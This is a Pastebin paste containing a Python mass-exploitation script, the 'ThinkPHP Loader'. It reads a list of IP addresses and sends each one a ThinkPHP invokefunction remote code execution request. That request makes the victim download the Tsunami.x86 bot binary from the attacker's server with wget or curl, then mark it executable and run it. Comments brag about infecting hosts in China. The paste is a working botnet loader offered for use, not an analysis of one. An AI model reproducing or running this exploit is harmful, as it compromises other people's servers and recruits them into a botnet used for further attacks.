Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #usr/bin/python
- # Kadens ThinkPHP Loader
- # Port 80 or 8080 (USE PORT 80 BEST RESULTS)
- # Asia is most vulnerable. (I pull boats in China)
- import threading, sys, time, re, os, requests
- if len(sys.argv) < 2:
- print "\033[37mUsage: python "+sys.argv[0]+" list \033[37m"
- sys.exit()
- server = "1.1.1.1" # YOUR BOTNETS IP
- location = "OwO/Tsunami.x86" # YOUR x86 BIN (If it is in a dir do bins/x86.bin or whatever) if no dir it would just be the bin name
- x86 = "Tsunami.x86" # The name of the x86 bin
- ips = open(sys.argv[1], "r").readlines()
- class think(threading.Thread):
- def __init__ (self, ip):
- threading.Thread.__init__(self)
- self.ip = str(ip).rstrip('\n')
- def run(self):
- try:
- print("\033[37m[\033[36mThinkPHP\033[37m] Trying \033[36m-> \033[37m%s") % (self.ip)
- payload = "http://"+self.ip+"/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://"+server+"/"+location+";cat%20"+x86+"%20>%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp"
- payload1 = "http://"+self.ip+"/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20http://"+server+"/"+location+";cat%20"+x86+"%20>%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp"
- requests.get(payload, verify=False, timeout=5)
- requests.get(payload1, verify=False, timeout=5)
- except:
- pass
- for ip in ips:
- try:
- kaden = think(ip)
- kaden.start()
- except:
- pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement